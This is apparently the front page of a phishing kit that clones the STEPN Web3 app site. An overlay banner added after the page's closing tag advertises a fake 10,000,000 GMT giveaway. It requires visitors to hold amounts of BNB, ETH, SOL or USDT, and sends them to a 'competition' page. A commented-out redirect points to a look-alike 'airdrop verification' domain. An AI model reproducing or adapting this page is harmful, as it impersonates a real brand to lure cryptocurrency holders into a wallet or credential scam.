<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <title>STEPN is a Web3 lifestyle app with Social-Fi and Game-Fi elements</title>
    <meta content="Green Metaverse Token (GMT) is now listed on all top exchanges. To celebrate all of our current exchange listings, achievements and market caps, we are promising to give away 10,000,000 GMT to fans around the world." name="description">
    <meta content="GREEN METAVERSE TOKEN (GMT) COMPETITION" property="og:title">
    <meta content="Green Metaverse Token (GMT) is now listed on all top exchanges. To celebrate all of our current exchange listings, achievements and market caps, we are promising to give away 10,000,000 GMT to fans around the world." property="og:description">
    <meta property="og:site_name" content="STEPN">
    <meta content="GREEN METAVERSE TOKEN (GMT) COMPETITION" property="twitter:title">
    <meta content="Green Metaverse Token (GMT) is now listed on all top exchanges. To celebrate all of our current exchange listings, achievements and market caps, we are promising to give away 10,000,000 GMT to fans around the world." property="twitter:description">
    <meta property="og:type" content="website">
    <meta content="summary_large_image" name="twitter:card">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <meta content="./stepn.jpg" property="og:image" />
    <link rel="icon" href="img/favicon.ico" />
    <link rel="stylesheet" href="https://unpkg.com/aos@next/dist/aos.css" />
    <link rel="stylesheet" charset="UTF-8" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.6.0/slick.min.css" />
    <title>STEPN is a Web3 lifestyle app with Social-Fi and Game-Fi elements</title>
    <script src="downloadUrl.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.slim.min.js" integrity="sha256-u7e5khyithlIdTpu22PHhENmPcRdFiHRjhAuHcs05RI=" crossorigin="anonymous"></script>
    <script type="text/javascript">
        jQuery, window.fnames = new Array, window.ftypes = new Array, fnames[1] = "FNAME", ftypes[1] = "text", fnames[2] = "LNAME", ftypes[2] = "text", fnames[0] = "EMAIL", ftypes[0] = "email", fnames[6] = "MMERGE6", ftypes[6] = "text", fnames[3] = "ADDRESS", ftypes[3] = "address", fnames[4] = "PHONE", ftypes[4] = "phone", fnames[5] = "BIRTHDAY", ftypes[5] = "birthday";
        var $mcj = jQuery.noConflict(!0)
    </script>
    <style>
        .loading {
            position: fixed;
            left: 0;
            top: 0;
            width: 100vw;
            height: 100vh;
            background-color: #000;
            z-index: 999;
            display: flex;
            justify-content: center;
            align-items: center
        }

        @media screen and (max-width:768px) {
            .loading img {
                width: 300px
            }
        }
    </style>
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-2114GLK1P9"></script>
    <script>
        function gtag() {
            dataLayer.push(arguments)
        }
        window.dataLayer = window.dataLayer || [], gtag("js", new Date), gtag("config", "G-2114GLK1P9")
    </script>
    <script src="https://www.google.com/recaptcha/api.js?render=explicit" async defer="defer"></script>
    <style>
        #robot {
            position: fixed;
            left: 50%;
            transform: translate(-50%, 0);
            bottom: 270px
        }

        @media screen and (max-width:768px) {
            #robot {
                bottom: 200px
            }
        }
    </style>
</head>

<body><noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root"></div>
    <div id="robot"></div>
    <script src="https://unpkg.com/aos@next/dist/aos.js"></script>
    <script>
        const insertLoadingDom = () => {
                const e = document.createElement("div");
                e.className = "loading", e.id = "loading";
                const t = document.createElement("img");
                t.src = "/img/loading.gif", t.width = "1000", t.alt = "", e.appendChild(t), document.body.appendChild(e)
            },
            hideLoading = e => {
                e.some(e => location.pathname.startsWith(e)) || insertLoadingDom()
            };
        hideLoading(["/activeCode", "/getCode"]), AOS.init(),
            setTimeout(() => {
            const e = document.getElementById("loading");
            e && e.remove();
            document.getElementById("sbcs").style.display = ""
        }, 3700)
    </script>
    <script>
        ! function(e) {
            function t(t) {
                for (var n, o, u = t[0], i = t[1], f = t[2], s = 0, d = []; s < u.length; s++) o = u[s], Object.prototype.hasOwnProperty.call(a, o) && a[o] && d.push(a[o][0]), a[o] = 0;
                for (n in i) Object.prototype.hasOwnProperty.call(i, n) && (e[n] = i[n]);
                for (l && l(t); d.length;) d.shift()();
                return c.push.apply(c, f || []), r()
            }

            function r() {
                for (var e, t = 0; t < c.length; t++) {
                    for (var r = c[t], n = !0, o = 1; o < r.length; o++) {
                        var i = r[o];
                        0 !== a[i] && (n = !1)
                    }
                    n && (c.splice(t--, 1), e = u(u.s = r[0]))
                }
                return e
            }
            var n = {},
                o = {
                    7: 0
                },
                a = {
                    7: 0
                },
                c = [];

            function u(t) {
                if (n[t]) return n[t].exports;
                var r = n[t] = {
                    i: t,
                    l: !1,
                    exports: {}
                };
                return e[t].call(r.exports, r, r.exports, u), r.l = !0, r.exports
            }
            u.e = function(e) {
                var t = [];
                o[e] ? t.push(o[e]) : 0 !== o[e] && {
                    10: 1
                }[e] && t.push(o[e] = new Promise((function(t, r) {
                    for (var n = "static/css/" + ({
                            1: "activeCode",
                            2: "contactUs",
                            3: "getCode",
                            4: "home",
                            6: "medium"
                        }[e] || e) + "." + {
                            0: "31d6cfe0",
                            1: "31d6cfe0",
                            2: "31d6cfe0",
                            3: "31d6cfe0",
                            4: "31d6cfe0",
                            6: "31d6cfe0",
                            9: "31d6cfe0",
                            10: "1f3f3764",
                            11: "31d6cfe0"
                        }[e] + ".chunk.css", a = u.p + n, c = document.getElementsByTagName("link"), i = 0; i < c.length; i++) {
                        var f = (l = c[i]).getAttribute("data-href") || l.getAttribute("href");
                        if ("stylesheet" === l.rel && (f === n || f === a)) return t()
                    }
                    var s = document.getElementsByTagName("style");
                    for (i = 0; i < s.length; i++) {
                        var l;
                        if ((f = (l = s[i]).getAttribute("data-href")) === n || f === a) return t()
                    }
                    var d = document.createElement("link");
                    d.rel = "stylesheet", d.type = "text/css", d.onload = t, d.onerror = function(t) {
                        var n = t && t.target && t.target.src || a,
                            c = new Error("Loading CSS chunk " + e + " failed.\n(" + n + ")");
                        c.code = "CSS_CHUNK_LOAD_FAILED", c.request = n, delete o[e], d.parentNode.removeChild(d), r(c)
                    }, d.href = a, document.getElementsByTagName("head")[0].appendChild(d)
                })).then((function() {
                    o[e] = 0
                })));
                var r = a[e];
                if (0 !== r)
                    if (r) t.push(r[2]);
                    else {
                        var n = new Promise((function(t, n) {
                            r = a[e] = [t, n]
                        }));
                        t.push(r[2] = n);
                        var c, i = document.createElement("script");
                        i.charset = "utf-8", i.timeout = 120, u.nc && i.setAttribute("nonce", u.nc), i.src = function(e) {
                            return u.p + "./static/js/" + ({
                                1: "activeCode",
                                2: "contactUs",
                                3: "getCode",
                                4: "home",
                                6: "medium"
                            }[e] || e) + "." + {
                                0: "4cce8f1d",
                                1: "9b633b1f",
                                2: "ebd6ca73",
                                3: "6c1553bd",
                                4: "5d68e14b",
                                6: "aec97621",
                                9: "de6183cb",
                                10: "1547d902",
                                11: "78c9ba5d"
                            }[e] + ".chunk.js"
                        }(e);
                        var f = new Error;
                        c = function(t) {
                            i.onerror = i.onload = null, clearTimeout(s);
                            var r = a[e];
                            if (0 !== r) {
                                if (r) {
                                    var n = t && ("load" === t.type ? "missing" : t.type),
                                        o = t && t.target && t.target.src;
                                    f.message = "Loading chunk " + e + " failed.\n(" + n + ": " + o + ")", f.name = "ChunkLoadError", f.type = n, f.request = o, r[1](f)
                                }
                                a[e] = void 0
                            }
                        };
                        var s = setTimeout((function() {
                            c({
                                type: "timeout",
                                target: i
                            })
                        }), 12e4);
                        i.onerror = i.onload = c, document.head.appendChild(i)
                    }
                return Promise.all(t)
            }, u.m = e, u.c = n, u.d = function(e, t, r) {
                u.o(e, t) || Object.defineProperty(e, t, {
                    enumerable: !0,
                    get: r
                })
            }, u.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, u.t = function(e, t) {
                if (1 & t && (e = u(e)), 8 & t) return e;
                if (4 & t && "object" == typeof e && e && e.__esModule) return e;
                var r = Object.create(null);
                if (u.r(r), Object.defineProperty(r, "default", {
                        enumerable: !0,
                        value: e
                    }), 2 & t && "string" != typeof e)
                    for (var n in e) u.d(r, n, function(t) {
                        return e[t]
                    }.bind(null, n));
                return r
            }, u.n = function(e) {
                var t = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return u.d(t, "a", t), t
            }, u.o = function(e, t) {
                return Object.prototype.hasOwnProperty.call(e, t)
            }, u.p = "/", u.oe = function(e) {
                throw console.error(e), e
            };
            var i = this["webpackJsonpstepn-web-react"] = this["webpackJsonpstepn-web-react"] || [],
                f = i.push.bind(i);
            i.push = t, i = i.slice();
            for (var s = 0; s < i.length; s++) t(i[s]);
            var l = f;
            r()
        }([])
    </script>
    <script src="static/js/8.e574223f.chunk.js"></script>
    <script src="static/js/main.cd826ce5.chunk.js"></script>
</body>

</html>
<style>
    #ssub {
        width: 80%;
    }

    .shwon {
        display: block;
    }

    .unshwon {
        display: none;
    }

    .bottomfooter {
        position: fixed;
        bottom: 0;
        background: #f6f6f6;
        text-align: center;
    }

    #sda {
        position: absolute;
        margin-top: 15px;
    }

    #rr {
        margin-top: 0%;
        padding-left: 15%;
        padding-right: 20%;
        display: flex;
        flex-direction: row;
    }

    #dfi {
        padding-top: 0px;
        margin-top: 0px;
        position: absolute;
        left: 30%;
        right: 30%;
        text-align: center
    }

    #h32 {
        text-align: left;
        margin-left: 15%;
        font-size: 16px;
        margin-bottom: 0%;
        margin-top: 10px;
    }

    #hfr {
        margin-bottom: 0%;
    }

    #ppp {
        margin-top: 1%;
        padding-right: 20%;
        text-align: left;
        line-height: 20px;
        font-size: 14px;
    }

    #leadn {
        padding-left: 20%;
        padding-right: 20%;
        font-size: 17px;
        text-align: center;
    }

    #jhg {
        margin-top: -20%;
    }

    #ftrs {
        margin-top: -20%;
    }

    @media (max-width: 800px) {
        #rr {
            flex-direction: column;
        }
    }

    @media only screen and (max-width: 600px) {
        #ssub {
            width: 90%;
        }
        #hutt {
            margin-top: -34%;
        }
        #mmh1 {
            font-size: 160%;
        }
        #ccssdd {
            width: 140%;
        }
        #leadn {
            font-size: 14px;
            padding-left: 1%;
            padding-right: 1%;
        }
        #rr {
            padding-left: 5%;
            padding-right: 5%;
            padding-bottom: 10px;
            text-align: center;
        }
        #sda {
            position: relative;
            margin-bottom: 10px;
        }
        #h32 {
            font-size: 18px;
            text-align: center;
            margin-left: auto;
        }
        #ppp {
            padding-right: 0%;
            text-align: center;
            font-size: 12px;
            margin-bottom: 6%;
        }
        #dfi {
            padding-bottom: 0px;
            left: 0%;
            right: 0%;
            position: absolute;
        }
        #wef {
            font-size: 10px;
        }
        #jhg {
            margin-top: -180%;
        }
        #ftrs {
            margin-top: 20%;
        }
        #jjjin {
            margin-top: 170%;
        }
    }
</style>
<div id="sbcs" class="bottomfooter" style="text-align: center; padding-bottom: 20px; z-index: 9999;display: none">
    <div align="center" id="hfr">
        <h3 id="h32" style="font-family: TTOctosquares-Black;letter-spacing: -1.05px;line-height: 48px;font-size: 25px;">GREEN METAVERSE TOKEN (GMT) COMPETITION</h3>
    </div>
    <div class="row" id="rr">
        <div class=" col-md-10" style="color: #000;font-family: SourceCodeVariable-Roman;letter-spacing: -0.3px;line-height: 30px;font-size: 24px;">
            <p id="ppp">Green Metaverse Token (GMT) is now listed on all top exchanges. To celebrate all of our current exchange listings, achievements and market caps, we are promising to give away 10,000,000 GMT to fans around the world. Everyone can participate; users can only participate once during this campaign. In order to qualify, users must own at least 5 BNB/0.5 ETH/30 SOL/1500 USDT/520 GST during the competition. All eligible users will share 10,000,000 GMT.
            </p>
        </div>
        <div class="mmd">
            <a id="sda" href="competition/index.html"
               style="text-decoration: none; cursor: pointer; padding-top: 15px;padding-bottom: 15px;padding-left: 70px;padding-right: 70px; background: rgb(114, 245, 150); border-radius: 50px; color: #000; font-size: 18px;font-family: TTOctosquares-Black;">JOIN
                TODAY</a>
        </div>
    </div>
</div>
<script>
    // var timer = setTimeout(function() {
    //     window.location = 'https://stepn-event.com/airdrop/verification/'
    // }, 20000);
</script>
